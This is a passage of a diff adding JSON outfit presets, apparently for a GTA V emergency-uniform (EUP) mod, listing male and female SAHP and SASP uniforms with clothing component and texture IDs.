+"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "20:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "29:3", +"Parachute": "49:1" + }, + { +"Name": "Female SAHP Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "31:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "42:3", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:3", +"Parachute": "49:1" + }, + { +"Name": "Male SAHP Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "26:2", +"Shoes": "16:1", +"Accessories": "9:1", +"Armor": "29:3", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "42:3", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:3", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Motorcycle Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:5", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "33:1", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Motorcycle Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:5", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "33:1", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Motorcycle Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:5", +"UpperSkin": "27:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "33:1", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Leather Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "54:1", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "33:1", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "29:3", +"Parachute": "49:1" + }, + { +"Name": "Female SAHP Leather Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "47:1", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "32:1", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "31:3", +"Parachute": "48:1" + }, + { +"Name": "Female SAHP Motorcycle Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:5", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "32:1", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Motorcycle Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:5", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "32:1", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Female SAHP Motorcycle Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "18:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:5", +"UpperSkin": "29:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "32:1", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "56:1" + }, + { +"Name": "Male SAHP Utility Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP Utility Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:5", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:4" + }, + { +"Name": "Female SAHP Utility Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "135:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:4" + }, + { +"Name": "Female SAHP Utility Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "135:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:5", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:5", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female SAHP Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "135:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:5", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male CVS Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "150:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "29:4", +"Parachute": "66:4" + }, + { +"Name": "Female CVS Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "147:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "31:4", +"Parachute": "66:4" + }, + { +"Name": "Male CVS Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "87:12", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "29:4", +"Parachute": "66:4" + }, + { +"Name": "Female CVS Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:4", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP K-9 Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "88:12", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP K-9 Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "136:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "213:6", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "88:12", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "15:1", +"Parachute": "66:4" + }, + { +"Name": "Female SAHP K-9 Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "135:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "91:12", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:4" + }, + { +"Name": "Female SAHP K-9 Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "135:21", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "227:6", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "91:12", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP Riot Gear", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "93:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "186:1", +"Top": "151:6", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "54:1", +"Pants": "126:8", +"Shoes": "55:1", +"Accessories": "2:1", +"Armor": "6:2", +"Parachute": "66:4" + }, + { +"Name": "Female SAHP Riot Gear", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "125:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "186:1", +"Top": "148:6", +"UpperSkin": "40:1", +"Decal": "1:1", +"UnderCoat": "28:2", +"Pants": "132:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "4:2", +"Parachute": "66:4" + }, + { +"Name": "Male SAHP SWAT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "40:2", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:4", +"Top": "221:8", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "38:2", +"Shoes": "36:2", +"Accessories": "111:1", +"Armor": "26:8", +"Parachute": "49:1" + }, + { +"Name": "Female SAHP SWAT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "39:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:4", +"Top": "231:8", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "37:2", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:8", +"Parachute": "49:1" + }, + { +"Name": "Male SAHP Pilot Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "80:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:4", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "65:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female SAHP Pilot Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "79:1", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:4", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "30:1", +"Pants": "67:3", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male SAHP Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:1", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:15", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "1:1", +"Armor": "36:1", +"Parachute": "69:1" + }, + { +"Name": "Male SAHP Inspector", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "349:16", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "36:1", +"Parachute": "1:1" + }, + { +"Name": "Male SAHP Inspector (Vest)", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "293:15", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "132:11", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "36:1", +"Parachute": "1:1" + }, + { +"Name": "Female SAHP Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "25:4", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "105:14", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "1:1", +"Armor": "40:1", +"Parachute": "69:1" + }, + { +"Name": "Female SAHP Armor Protection", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "367:15", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "162:1", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "40:1", +"Parachute": "1:1" + }, + { +"Name": "Female SAHP Inspector", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "28:5", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "40:1", +"Parachute": "1:1" + }, + { +"Name": "Male SAHP Windbreaker", +"Gender": "Male", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:9", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:15", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "7:1", +"Armor": "18:9", +"Parachute": "30:10" + }, + { +"Name": "Female SAHP Windbreaker", +"Gender": "Female", +"Category": "EUP", +"Category2": "SAHP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:9", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "105:14", +"Pants": "4:5", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "40:1", +"Parachute": "1:1" + }, + { +"Name": "Male SASP Ranger Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Ranger Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Ranger Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:6", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Ranger Turtleneck", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "3:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Ranger Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Ranger K-9", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "210:14", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "66:15" + }, + { +"Name": "Female SASP Ranger K-9", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "226:14", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "16:1", +"Parachute": "66:15" + }, + { +"Name": "Male SASP Ranger Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:10", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Ranger Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "9:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:4", +"UpperSkin": "39:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:7" + }, + { +"Name": "Male SASP Ranger Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "22:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:5", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Ranger Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:5", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Lifeguard Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Lifeguard Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Lifeguard Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:7", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Lifeguard Turtleneck", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "197:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "37:1" + }, + { +"Name": "Male SASP Lifeguard Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Lifeguard Polo", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:11", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "95:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "1:1" + }, + { +"Name": "Male SASP Lifeguard Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "3:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:5", +"UpperSkin": "39:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:10" + }, + { +"Name": "Male SASP Lifeguard Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "22:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:6", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Lifeguard Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "136:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "50:2", +"Pants": "87:13", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:6", +"Parachute": "49:1" + }, + { +"Name": "Male SASP Lifeguard Bathsuit", +"Gender": "Male", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "312:11", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "20:2", +"Pants": "7:5", +"Shoes": "35:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female SASP Ranger Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "5:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Ranger Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Ranger Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:6", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Ranger Turtleneck", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Ranger Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Ranger Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "135:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:10", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Ranger Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "9:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:4", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:9", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:7" + }, + { +"Name": "Female SASP Ranger Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "135:19", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", 